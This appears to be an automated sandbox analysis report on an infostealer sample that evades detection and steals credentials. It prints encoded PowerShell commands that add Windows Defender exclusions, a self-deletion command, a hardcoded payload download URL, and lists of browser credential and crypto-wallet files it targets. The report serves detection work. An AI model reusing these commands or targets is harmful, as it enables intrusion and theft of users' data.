Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: OceanicTools.exe Binary or memory string: vmware
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: OceanicTools.exe Binary or memory string: SYSTEM\CurrentControlSet\Services\Disk\EnumqueryregmanufacturergetcomputersystemwmicopenvzxenqemukvmmicrosoftvirtualboxvmwareKVMQEMUVBOXVMwareLicense Agreementhttp://185.208.158.47/phantomtoolsv2.exeAnalNosorog256X-Secret-Phrase')); Invoke-Expression $cmd"Add-MpPreference -ExclusionPath "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('-Commandpowershell.exeInstallation completed.An error occurred during installation.Installation canceled by the user.User Agreement for Software Application:
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 GetCurrentProcess,NtQueryInformationProcess,GetTempPathW,wcslen,wcslen,strlen,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wcslen,LdrLoadDll,GetProcAddress,VirtualProtect,LdrUnloadDll, 11_2_00007FF6350D3C70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D02C8 IsDebuggerPresent, 14_2_00000001400D02C8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B8A44 GetLastError,IsDebuggerPresent,OutputDebugStringW, 14_2_00000001400B8A44
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A4D28 GetProcessHeap, 14_2_00000001400A4D28
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process token adjusted: Debug
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D11D9 SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy, 11_2_00007FF6350D11D9
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF635370550 SetUnhandledExceptionFilter, 11_2_00007FF635370550
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D02D8 SetUnhandledExceptionFilter, 14_2_00000001400D02D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008D3D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_000000014008D3D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D11D9 SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 14_2_00007FF6350D11D9

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: OceanicTools.exe, type: SAMPLE
Source: Yara match File source: amsi64_7128.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_6696.amsi.csv, type: OTHER
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe NtClose: Indirect: 0x7FF6350D4830
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe NtQueryInformationProcess: Indirect: 0x7FF6350D3098
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe NtQueryInformationProcess: Indirect: 0x7FF6350D3CAD
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Memory written: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Thread register set: target process: 3524
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140072EC0 ShellExecuteW, 14_2_0000000140072EC0
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" "computersystem" "get" "manufacturer"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-command" "$cmd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaiqzpcvxnlcnncywxmb25zxgzvzwtzzxlya2t6ew9vehlccwzsd2vkdgtpahv6exhszy5legui')); invoke-expression $cmd"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D4350 cpuid 11_2_00007FF6350D4350
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_00000001400A409C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_00000001400A416C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_00000001400A4204
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_0000000140099354
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_00000001400D0390
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoEx,FormatMessageA, 14_2_00000001400B63B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_00000001400D03A8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_00000001400A4450
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_00000001400A45A8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_00000001400A4658
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_00000001400A4784
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_0000000140099898
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 14_2_00000001400A3D50
Source: C:\Users\user\Desktop\OceanicTools.exe Queries volume information: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyName
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EB460 GetSystemTimeAsFileTime,SleepConditionVariableCS,GetLastError, 11_2_00007FF6350EB460
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007DCC0 GetUserNameW, 14_2_000000014007DCC0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007F210 GetTimeZoneInformation,GlobalMemoryStatusEx,wcsftime,GetModuleFileNameA, 14_2_000000014007F210

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR
Source: Yara match File source: 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\config
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\configer
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000005.00000002.2231709935.00007FF8490E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR
Source: Yara match File source: 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY